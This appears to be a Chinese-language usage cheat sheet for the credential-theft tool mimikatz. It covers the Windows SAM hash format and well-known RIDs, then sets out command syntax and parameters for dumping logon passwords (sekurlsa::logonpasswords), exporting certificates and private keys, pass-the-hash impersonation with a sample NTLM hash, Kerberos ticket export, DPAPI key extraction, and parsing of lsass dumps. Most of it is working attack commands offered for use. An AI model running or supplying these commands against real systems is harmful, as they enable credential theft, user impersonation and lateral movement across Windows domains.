下载地址
https://github.com/gentilkiwi/mimikatz/
windows:https://download.csdn.net/download/think_ycx/9362975
官方使用教程
http://www.91ri.org/15178.html
windows密码文件的解读
加密方式链接:
https://blog.csdn.net/ytfhjhv/article/details/83513671
存储位置:C:\windows\system32\config\SAM
密码文件存储格式:
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
SID和RID的解读:
链接:https://www.secpulse.com/archives/72017.html
SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构
RID:Windows系统账户对应固定的RID
500: ADMINISTRATOR
501: GUEST
502: krbtgt(域环境)
512: Domain Admins(域环境)
513: Domain Users(域环境)
514: Domain Guests(域环境)
515: Domain Computers(域环境)
516: Domain Controllers(域环境)
命令
standard
退出
exit
清屏
cls
将所所有输出记录到文件中
log other.log
log /stop (停止文件记录)
从磁盘上的文件写入切换到Base64输出
base64
kerbreros::list /export
进入目录
cd xxx
privilege
privilege::debug
备注: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061表示所需的特权不是由客户端拥有的(通常您不是管理员)
crypto
提供的程序
crypto::providers
此命令列出系统存储中的逻辑存储
参数:
/systemstore- 可选 -必须使用列表存储系统存储(默认CERT_SYSTEM_STORE_CURRENT_USER),
它可以是一个:
CERT_SYSTEM_STORE_CURRENT_USER 要么 CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY 要么 USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE 要么 LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY 要么 LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE 要么 LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE 要么 CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS 要么 USERS
CERT_SYSTEM_STORE_SERVICES 要么 SERVICES
crypto::stores /systemstore:local_machine
此命令列出系统上或驱逐到系统上的智能卡/令牌读取器。
crypto::sc
此命令创建由证书颁发机构签名的用于智能卡身份验证的客户端证书
参数:
/caname -证书颁发机构的主题名称(需要签署证书)
/castore- 可选 -包含证书颁发机构的系统存储(默认:CERT_SYSTEM_STORE_LOCAL_MACHINE)
/upn-用户主要名称(UPN)为对象(如:user@lab.local)
/pfx- 可选 -用于保存最终证书的文件名(默认值:无文件,存储在中CERT_SYSTEM_STORE_CURRENT_USER)
crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
此命令列出证书及其密钥的属性,它也可以到处证书
参数:
/systemstore- 可选 -必须使用系统存储(默认:CERT_SYSTEM_STORE_CURRENT_USER)
/store- 可选 -必须用于列出/导出证书的存储(默认值:My)-具有以下内容的完整列表crypto::stores
/export- 可选 -导出所有的证书文件(在公共部位DER,在私处PFX的文件-有密码保护:mimikatz)
/silent- 可选 -如果需要用户交互,则中止
/nokey- 可选 -请勿尝试与私钥进行交互
certificates /systemstore:local_machine /store:my /export
备注:
请参阅crypto::stores以获取有效systemstore列表,其输出用于store列表。
不可导出的键(带有KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b))通常可以通过crypto::capi和/或导出crypto::cng
尽管crypto::capi或crypto::cng补丁,你必须在正确的文件系统ACL访问私有密钥
一些智能卡加密提供商可以报告成功的私人出口
键
此命令按提供程序列出密钥。它也可以导出密钥。
参数:
/provider- 可选 -传统CryptoAPI提供商(默认:MS_ENHANCED_PROV)
/providertype- 可选 -传统CryptoAPI提供者类型(默认值:PROV_RSA_FULL)
/cngprovider- 可选 -的CNG提供商(默认:Microsoft Software Key Storage Provider)
/export- 可选 -将所有密钥导出到PVK文件
/silent- 可选 -如果需要用户交互,则中止
crypto::keys /export
sekurlsa
登录密码
sekurlsa::logonpasswords
pth
参数:
/user -您要模拟的用户名,请记住,管理员不是此知名帐户的唯一名称。
/domain-完全限定的域名-没有域,或者在本地用户/管理员的情况下,请使用计算机或服务器名称,workgroup或其他名称。
/rc4或/ntlm- 可选 -用户密码的RC4密钥/ NTLM哈希。
/aes128- 可选 -从用户密码和域领域派生的AES128密钥。
/aes256- 可选 -从用户密码和域域派生的AES256密钥。
/run- 可选 -要运行的命令行-默认为:cmd具有外壳。
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
备注:
此命令不适用于小型转储(废话);
它需要提升的特权(privilege::debug或SYSTEM帐户),与使用一种官方API的“通行票”不同;
这个新版本的“通过-散列”将RC4 keysKerberos 替换为ntlm散列(和/或替换AES密钥)-它允许Kerberos提供程序询问TGT票证!;
ntlm在XP / 2003 / Vista / 2008和7 / 2008r2 / 8/2012之前,哈希是必需的kb2871997(AES不可用或不可替换);
AES密钥只能在8.1 / 2012r2或7 / 2008r2 / 8/2012上替换为kb2871997,在这种情况下,您可以避免使用ntlm哈希。
tickets
sekurlsa::tickets /export
ekeys
sekurlsa::ekeys
dpapi
sekurlsa::dpapi
minidump
sekurlsa::minidump lsass.dmp
kerberos
sekurlsa::kerberos